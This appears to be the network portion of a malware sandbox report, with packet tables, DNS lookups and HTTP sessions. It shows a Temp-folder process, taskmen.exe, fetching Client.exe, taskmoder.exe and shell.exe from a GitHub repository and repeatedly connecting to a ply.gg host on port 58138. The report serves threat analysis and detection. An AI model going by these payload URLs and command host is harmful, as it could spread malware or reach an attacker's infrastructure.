                                                                                      Oct 5, 2024 21:57:33.392904997 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.392930031 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.393069983 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.393129110 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.393147945 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.393213987 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.393265963 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.393274069 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.393882036 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.393937111 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.393943071 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.393958092 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.394009113 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.394018888 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.475419998 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.475497007 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.475519896 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.475606918 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.475672007 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.475677967 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.475766897 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.475805998 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.475817919 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.475826025 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.475857973 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.476608992 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.476661921 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.476665020 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.476680040 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.476707935 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.477508068 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.477550983 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.477571964 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.477577925 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.477602005 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.478257895 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.478291035 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.478313923 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.478319883 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.478346109 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.478578091 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.478620052 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.478744984 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.478751898 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.479470968 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.479504108 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.479665995 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.479672909 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.480381966 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.480429888 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.480444908 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.480451107 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.480483055 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.561290026 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.561372042 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.561383009 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.561412096 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.561439991 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.561460972 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.562060118 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.562138081 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.562174082 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.562201977 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.562208891 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.562273979 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.562679052 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.562746048 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.562750101 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.562768936 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.562796116 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.562817097 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.563199043 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.563263893 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.563343048 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.563354969 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.563592911 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.563968897 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.564037085 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.564062119 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.564069033 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.564086914 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.564498901 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.564506054 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.564523935 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.564553022 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.564577103 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.564606905 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.564668894 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.564843893 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.564897060 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.564912081 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.564971924 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.565645933 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.565712929 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.565718889 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.565773010 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.565782070 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.565845966 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.648435116 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.648538113 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.648559093 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.648583889 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.648596048 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.649190903 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.649261951 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.649324894 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.649329901 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.649360895 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.649386883 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.649413109 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.649880886 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.649966002 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.650013924 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.650073051 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.650576115 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.650644064 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.650651932 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.650676966 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.650707006 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.650727034 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.650798082 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.650861025 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.650868893 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.650945902 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.650993109 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.655872107 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:35.799657106 CEST4978680192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:35.805469990 CEST8049786140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:35.805552006 CEST4978680192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:35.837930918 CEST4981980192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:35.842962027 CEST8049819140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:35.843189955 CEST4981980192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:35.843352079 CEST4981980192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:35.848418951 CEST8049819140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:36.454616070 CEST8049819140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:36.455975056 CEST49824443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:36.456012011 CEST44349824140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:36.456392050 CEST49824443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:36.456392050 CEST49824443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:36.456423998 CEST44349824140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:36.512419939 CEST49824443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:36.559410095 CEST44349824140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:36.559601068 CEST4981980192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:37.082400084 CEST44349824140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:37.082575083 CEST49824443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:43.805232048 CEST4985258138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:57:43.810193062 CEST5813849852209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 21:57:43.810276985 CEST4985258138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:57:45.495795965 CEST4981980192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:45.501153946 CEST8049819140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:45.501219988 CEST4981980192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:45.508203983 CEST4986280192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:45.513140917 CEST8049862140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:45.513211966 CEST4986280192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:45.513271093 CEST4986280192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:45.518510103 CEST8049862140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:46.138034105 CEST8049862140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:46.150449038 CEST49865443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:46.150495052 CEST44349865140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:46.150574923 CEST49865443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:46.150913000 CEST49865443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:46.150933027 CEST44349865140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:46.156269073 CEST49865443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:46.203411102 CEST44349865140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:46.241286993 CEST4986280192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:46.801822901 CEST44349865140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:46.801954031 CEST49865443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:46.802018881 CEST49865443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:58:01.138725042 CEST8049862140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:58:01.138897896 CEST4986280192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:58:05.180022001 CEST5813849852209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 21:58:05.180105925 CEST4985258138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:58:05.181325912 CEST4985258138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:58:05.182353973 CEST4996258138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:58:05.186259031 CEST5813849852209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 21:58:05.187330008 CEST5813849962209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 21:58:05.187438011 CEST4996258138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:58:26.565413952 CEST5813849962209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 21:58:26.565598011 CEST4996258138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:58:26.565701962 CEST4996258138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:58:26.570981026 CEST5813849962209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 21:58:26.580143929 CEST4998858138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:58:26.585261106 CEST5813849988209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 21:58:26.585448980 CEST4998858138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:58:47.941776991 CEST5813849988209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 21:58:47.941880941 CEST4998858138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:58:47.941972971 CEST4998858138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:58:47.942688942 CEST4998958138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:58:47.946857929 CEST5813849988209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 21:58:47.947597027 CEST5813849989209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 21:58:47.947684050 CEST4998958138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:59:09.351612091 CEST5813849989209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 21:59:09.351706982 CEST4998958138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:59:09.351779938 CEST4998958138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:59:09.352423906 CEST4999058138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:59:09.356827974 CEST5813849989209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 21:59:09.357295036 CEST5813849990209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 21:59:09.357619047 CEST4999058138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:59:26.167094946 CEST4986280192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:59:26.538460970 CEST4986280192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:59:27.241213083 CEST4986280192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:59:28.538062096 CEST4986280192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:59:30.742496014 CEST5813849990209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 21:59:30.742588043 CEST4999058138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:59:30.742714882 CEST4999058138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:59:30.743647099 CEST4999658138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:59:30.747905970 CEST5813849990209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 21:59:30.748594046 CEST5813849996209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 21:59:30.748713970 CEST4999658138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:59:31.038090944 CEST4986280192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:59:35.928761959 CEST4986280192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:59:45.538055897 CEST4986280192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:59:52.147495985 CEST5813849996209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 21:59:52.148077965 CEST4999658138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:59:52.149866104 CEST4999658138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:59:52.154747963 CEST5813849996209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 21:59:52.156168938 CEST5000058138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 21:59:52.161148071 CEST5813850000209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 21:59:52.161525011 CEST5000058138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 22:00:13.587909937 CEST5813850000209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 22:00:13.588004112 CEST5000058138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 22:00:13.588093996 CEST5000058138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 22:00:13.588810921 CEST5000458138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 22:00:13.593199015 CEST5813850000209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 22:00:13.593744993 CEST5813850004209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 22:00:13.593859911 CEST5000458138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 22:00:34.943089008 CEST5813850004209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 22:00:34.943243980 CEST5000458138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 22:00:34.943243980 CEST5000458138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 22:00:34.944284916 CEST5000858138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 22:00:34.948456049 CEST5813850004209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 22:00:34.949384928 CEST5813850008209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 22:00:34.949491024 CEST5000858138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 22:00:56.302723885 CEST5813850008209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 22:00:56.306056976 CEST5000858138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 22:00:56.306056976 CEST5000858138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 22:00:56.306638956 CEST5001258138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 22:00:56.311614037 CEST5813850008209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 22:00:56.312371969 CEST5813850012209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 22:00:56.312618971 CEST5001258138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 22:01:17.680021048 CEST5813850012209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 22:01:17.680207968 CEST5001258138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 22:01:26.422339916 CEST5001258138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 22:01:26.423127890 CEST5001858138192.168.2.5209.25.140.180
                                                                                      Oct 5, 2024 22:01:26.427640915 CEST5813850012209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 22:01:26.428128958 CEST5813850018209.25.140.180192.168.2.5
                                                                                      Oct 5, 2024 22:01:26.428215981 CEST5001858138192.168.2.5209.25.140.180

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Oct 5, 2024 21:57:30.305545092 CEST5963653192.168.2.51.1.1.1
                                                                                      Oct 5, 2024 21:57:30.312413931 CEST53596361.1.1.1192.168.2.5
                                                                                      Oct 5, 2024 21:57:32.316143990 CEST6184953192.168.2.51.1.1.1
                                                                                      Oct 5, 2024 21:57:32.323101044 CEST53618491.1.1.1192.168.2.5
                                                                                      Oct 5, 2024 21:57:43.790338039 CEST5149753192.168.2.51.1.1.1
                                                                                      Oct 5, 2024 21:57:43.802809000 CEST53514971.1.1.1192.168.2.5
                                                                                      Oct 5, 2024 21:57:45.496808052 CEST5975553192.168.2.51.1.1.1
                                                                                      Oct 5, 2024 21:57:45.503951073 CEST53597551.1.1.1192.168.2.5
                                                                                      Oct 5, 2024 21:58:26.566560984 CEST6188253192.168.2.51.1.1.1
                                                                                      Oct 5, 2024 21:58:26.579350948 CEST53618821.1.1.1192.168.2.5
                                                                                      Oct 5, 2024 21:59:14.771972895 CEST6206253192.168.2.51.1.1.1
                                                                                      Oct 5, 2024 21:59:14.780369997 CEST53620621.1.1.1192.168.2.5

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Oct 5, 2024 21:57:30.305545092 CEST192.168.2.51.1.1.10x5809Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                      Oct 5, 2024 21:57:32.316143990 CEST192.168.2.51.1.1.10xff4fStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                      Oct 5, 2024 21:57:43.790338039 CEST192.168.2.51.1.1.10x4d09Standard query (0)start-supplier.at.ply.ggA (IP address)IN (0x0001)false
                                                                                      Oct 5, 2024 21:57:45.496808052 CEST192.168.2.51.1.1.10x89bdStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                                      Oct 5, 2024 21:58:26.566560984 CEST192.168.2.51.1.1.10xc9b6Standard query (0)start-supplier.at.ply.ggA (IP address)IN (0x0001)false
                                                                                      Oct 5, 2024 21:59:14.771972895 CEST192.168.2.51.1.1.10xf962Standard query (0)240.163.3.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Oct 5, 2024 21:57:30.312413931 CEST1.1.1.1192.168.2.50x5809No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                                      Oct 5, 2024 21:57:32.323101044 CEST1.1.1.1192.168.2.50xff4fNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                      Oct 5, 2024 21:57:32.323101044 CEST1.1.1.1192.168.2.50xff4fNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                      Oct 5, 2024 21:57:32.323101044 CEST1.1.1.1192.168.2.50xff4fNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                      Oct 5, 2024 21:57:32.323101044 CEST1.1.1.1192.168.2.50xff4fNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                      Oct 5, 2024 21:57:43.802809000 CEST1.1.1.1192.168.2.50x4d09No error (0)start-supplier.at.ply.gg209.25.140.180A (IP address)IN (0x0001)false
                                                                                      Oct 5, 2024 21:57:45.503951073 CEST1.1.1.1192.168.2.50x89bdNo error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                                      Oct 5, 2024 21:58:26.579350948 CEST1.1.1.1192.168.2.50xc9b6No error (0)start-supplier.at.ply.gg209.25.140.180A (IP address)IN (0x0001)false
                                                                                      Oct 5, 2024 21:59:14.780369997 CEST1.1.1.1192.168.2.50xf962Name error (3)240.163.3.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • github.com
                                                                                      • raw.githubusercontent.com

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.549786140.82.121.3806336C:\Users\user\AppData\Local\Temp\taskmen.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 5, 2024 21:57:30.396894932 CEST113OUTGET /darkZeusWeb/loadersoft/raw/refs/heads/main/Client.exe HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: Keep-Alive
                                                                                      Oct 5, 2024 21:57:31.007376909 CEST137INHTTP/1.1 301 Moved Permanently
                                                                                      Content-Length: 0
                                                                                      Location: https://github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/Client.exe
                                                                                      Oct 5, 2024 21:57:31.219315052 CEST137INHTTP/1.1 301 Moved Permanently
                                                                                      Content-Length: 0
                                                                                      Location: https://github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/Client.exe


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.549819140.82.121.3806336C:\Users\user\AppData\Local\Temp\taskmen.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 5, 2024 21:57:35.843352079 CEST116OUTGET /darkZeusWeb/loadersoft/raw/refs/heads/main/taskmoder.exe HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: Keep-Alive
                                                                                      Oct 5, 2024 21:57:36.454616070 CEST140INHTTP/1.1 301 Moved Permanently
                                                                                      Content-Length: 0
                                                                                      Location: https://github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/taskmoder.exe


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.549862140.82.121.3806336C:\Users\user\AppData\Local\Temp\taskmen.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 5, 2024 21:57:45.513271093 CEST112OUTGET /darkZeusWeb/loadersoft/raw/refs/heads/main/shell.exe HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: Keep-Alive
                                                                                      Oct 5, 2024 21:57:46.138034105 CEST136INHTTP/1.1 301 Moved Permanently
                                                                                      Content-Length: 0
                                                                                      Location: https://github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/shell.exe


                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.549790140.82.121.34436336C:\Users\user\AppData\Local\Temp\taskmen.exe
                                                                                      TimestampBytes transferredDirectionData
